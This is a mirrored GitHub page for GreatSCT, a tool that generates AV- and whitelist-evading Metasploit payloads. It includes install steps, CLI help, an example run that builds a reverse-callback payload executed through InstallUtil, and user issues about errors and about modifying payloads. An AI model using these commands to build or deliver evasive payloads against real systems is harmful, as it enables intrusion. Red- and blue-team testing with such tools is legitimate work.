greatsct / greatsct Goto Github PK

The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.

License: GNU General Public License v3.0

Python 95.50% Ruby 1.61% Shell 2.89%

greatsct's Introduction

GreatSCT

GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

GreatSCT is current under support by @ConsciousHacker

Software Requirements:

Linux

Kali - run the setup script - sudo ./setup.sh -c

NOTE: Support for distributions other than Kali Linux will be coming soon.

Setup (tl;dr)

NOTE: Installation must be done with superuser privileges. If you are not using Kali Linux, prepend each command with sudo or change to the root user before beginning.

Run ./setup.sh -c on Linux.

Install by cloning from git, not via apt!

Quick Install

apt-get -y install git
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/
cd setup
sudo ./setup.sh -c

Regenerating Config

NOTE: This must be done with superuser privileges. If you are not using Kali Linux, prepend each command with sudo or change to the root user before beginning.

Most of the time the config file at /etc/greatsct/settings.py will not need to be rebuilt but in some cases you might be prompted to do so. The file is generated by config/update.py.

It is important that you are in the config/ directory before executing update.py. If you are not, settings.py will be incorrect and when you launch GreatSCT you will see the following.

    Main Menu

            0 payloads loaded

Don't panic. Enter the config/ dir and re-run update.py.

Example Usage

GreatSCT's Main Menu:

                             GreatSCT | [Version]: 1.0
===============================================================================
      [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================

Main Menu

	1 tools loaded

Available Commands:

	exit			Exit GreatSCT
	info			Information on a specific tool
	list			List available tools
	update			Update GreatSCT
	use			Use a specific tool

Main menu choice:

Help

usage: GreatSCT.py [--update] [--version] [--list-tools] [-t Bypass] [--ip IP]
                   [--port Port] [--list-payloads]
                   [-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]]
                   [-o OUTPUT NAME] [-p [PAYLOAD]] [--clean]
                   [--msfoptions [OPTION=value [OPTION=value ...]]]
                   [--msfvenom [windows/meterpreter/reverse_tcp]]

GreatSCT is a framework to generate application whitelisting bypasses.

GreatSCT Options:
  --update              Update the GreatSCT framework.
  --version             Displays version and quits.
  --list-tools          List GreatSCT's tools
  -t Bypass, --tool Bypass
                        Specify GreatSCT tool to use (Bypass)

Callback Settings:
  --ip IP, --domain IP  IP Address to connect back to
  --port Port           Port number to connect to.

[*] Payload Settings:
  --list-payloads       Lists all available payloads for that tool

Great Scott Options:
  -c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]
                        Custom payload module options.
  -o OUTPUT NAME        Output file base name for source and compiled
                        binaries.
  -p [PAYLOAD]          Payload to generate. Lists payloads if none specified.
  --clean               Clean out payload folders.
  --msfoptions [OPTION=value [OPTION=value ...]]
                        Options for the specified metasploit payload.
  --msfvenom [windows/meterpreter/reverse_tcp]
                        Metasploit shellcode to generate.

GreatSCT Bypass CLI

# ./GreatSCT.py --ip 192.168.157.136 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
===============================================================================
                                   Great Scott!
===============================================================================
      [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================

 [*] Language: installutil_powershell
 [*] Payload Module: installutil/powershell/script
 [*] Executable written to: /usr/share/greatsct-output/compiled/payload4.exe
 [*] Source code written to: /usr/share/greatsct-output/source/payload4.cs
 [*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload4.exe
#
# file /usr/share/greatsct-output/compiled/payload4.exe
/usr/share/greatsct-output/compiled/payload4.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
#

Credits

https://github.com/veil-Framework/

Licensing

This project is licensed under the GNU General Public License v3 license.

greatsct's People

Contributors

Stargazers

Watchers

Forkers

jeperez johnjohnsp1 vysecurity jbarcia quikilr 453483289 cyri1s tobey123 shantanu561993 h1d3r olivierh59500 bwry mehrdad-shokri akpotter demonsec666 minkione b1gw00d tuian 474172261 av1080p team-firebugs kurtdegreeff threatinteltest expertasif jymcheong phpplay sucof techlord-rce w00t3k marcosd4h totoroha orf53975 gdraperi samyoyo ashr grant555 firstblue tycx2ry yzpku reydecopas h4ck0ne darg0001 h0k5 rand338 nsxz beerandgin mabangde r3dfruitrollup r3p3r linuxdemo lidd1224856175 m00zh33 jaishan hackinglz redwifiteam rakesh72 unforeseenocean dm2333 xenoscr peterg75 topotam hacker-one explife0011 jack51706 secfb julio1925 mkv4 riviera12345 yaserfaraj nickhakkz disk-kk gavz realmadaha splinterxor jtreen sadihw3 superuser5 defencelogic hfakar dannymas jutazhu ankushgoel27 snollyg0st3r rubyistctrldyt vantablacker ch4p34un0ir raystyle jayaramyalla haclang w4fz5uck5 azurecloudmonk flatl1neapt praveen18111992 modulexcite n1f2c3 dipsec slooppe sasqwatch bowentr bxlcity

greatsct's Issues

please check this erro

./GreatSCT.py --ip 192.168.8.100 --port 4444 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
Traceback (most recent call last):
File "./GreatSCT.py", line 103, in
the_conductor.command_line_use()
File "/root/Desktop/GreatSCT/lib/common/orchestra.py", line 38, in command_line_use
tool_object.cli_menu()
File "Tools/Bypass/Tool.py", line 200, in cli_menu
user_cli_payload.generate()
File "Tools/Bypass/payloads/installutil/powershell/script.py", line 54, in generate
with open(self.required_options["SCRIPT"][0], "r") as f:
FileNotFoundError: [Errno 2] No such file or directory: '/root/script.ps1'

error while testing

Dear Team,

I was able to pull the git with develop branch and have the result as below, Would you please take a look and tell me why i have one succeed session but the csv file report all failed?

I have nothing to say for myself

File "gr8sct.py", line 133
self.multipleApplicable = {**self.multipleApplicable, **tempDict} #...I have nothing to say for myself
^
SyntaxError: invalid syntax

Error starting GreatSct

When I start the tool with ./Greatsct.py it briefely displays some sysntax erros on screen but opens main menu. I chiise list, it gives me 1)Bypass, but when I choose bypass it returns to main menu. What to do ?

Error:unable to create output file

Help?

Installation issues on latest Kali

Hello,

Tried several times, installation does not finish successfully.
File https://blog.conscioushacker.io/wine.tgz is not accessible anymore.
Even if I Install wine manually and comment downloading wine.tgz in config.sh.
Also after complete installation any payload generation is broken.

Installation issue on Arch

setup.sh fail to install the depencys from base-devels ...

its a typo, correct to base-devel (https://www.archlinux.org/groups/x86_64/base-devel/)

Unable to find 'generateAll' option with new GreatSCT release?

Dear GreatSCT,

Thank you for an amazing tool.

In your previous release I used to generate payload in different formats using 'generateAll' option which I am unable to find with new release?

Is this option still supported? if yes, how to use it with new release?

Thanks a lot.

Regards,
-Bhadresh

unable to generate using MSFVenon

Using regsvcs/shellcode_inject/base64.py and selecting "Enter" for windows/meterpreter/reverse_tcp gives [!] ERROR: Invalid payload specified! and using Tab yields "Windows/". Not sure if this my error somewhere or something else? Steps I used to this point were the same from the demo video recorded at Circle City Con. Thank you.

Error in victim side

Hi
someone know what the problem ?
i used the --- > Moudle -- > regasm/meterpreter/rev_https

生成失败问题，第26个payload

[ERROR] Failed to install dependencies (Metasploit-Framework)... Exit code: 100

Version Information:

Debug: userhomedir = /root
Debug: rootdir = /root/GreatSCT
Debug: trueuser = root
Debug: userprimarygroup = root
Debug: os = kali
Debug: version = "2018.4"
Debug: winedir = /root/.greatsct

[I] Kali Linux "2018.4" x86_64 detected...

I installed kali, did an apt update, did an apt upgrade, and then attempted the "./setup.sh -c"

error while generating payload for testing purposes

Dear Team,

I ran your script on my kali box and try to test the capability of detecting malware with my windows. However, these are the errors that i got when running the script with python3 on my kali:

Execute with: regsvr32.exe /u /n /i:./GenerateAll/regsvr32.sct scrobj.dll

Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/usr/lib/python3.5/threading.py", line 862, in run
self._target(*self._args, **self._kwargs)
File "/root/Downloads/GreatSCT/fileOps.py", line 47, in generate
return (self.genFromTemplate(template))
File "/root/Downloads/GreatSCT/fileOps.py", line 92, in genFromTemplate
shellcodex64 = generator.genShellcode(domain, port, "x64", extraProcessing)
File "/root/Downloads/GreatSCT/generator.py", line 39, in genShellcode
shellcode = self.b64Encode(shellcode)
File "/root/Downloads/GreatSCT/generator.py", line 57, in b64Encode
shellcode = str(base64.b64encode(code))
File "/usr/lib/python3.5/base64.py", line 59, in b64encode
encoded = binascii.b2a_base64(s)[:-1]
TypeError: a bytes-like object is required, not 'str'

Would you please tell me where i did wrong? and how to fix it?

Sincerely,

Toto

dll problem

hello. this is great program..thanks for everything.I have a problem but it is not related to your program.
I am creating a dll file with this method >>> "regsvcs/meterpreter/rev_tcp.py"
I get a dll file and a .cs file with the above method.I want to make some changes on the .cs file.

for example, I am change function names ..i am converting .cs file to .dll file with visual studio prompt .
with this command, i am convert cs file to dll format >> csc /target:library /out:MyMaths.dll payload.cs

but i also get error when i want to run dll file with regsvcs.exe
this error
"1: 'C:\Users\Cyberthereaper\Desktop\MyMaths.dll' 'has no descriptive name

how to fix this problem?

other method
I'm opening a cs file with visual studio 2017 ..i am added reference "System.EnterpriseServices" and "System.Windows.Forms" .. i did compile payload.cs file with class libary ..

but i also get error when i want to run dll file with regsvcs.exe
Invalid classes derived from "servicedcomponent" ..Classes must be public and concrete, must be public default builders, and must meet all other ComVisibility requirements
lIUPQhMj.NfyxwnnZjTe: Unspecified error

what is problem ? how you converting .cs file to dll ?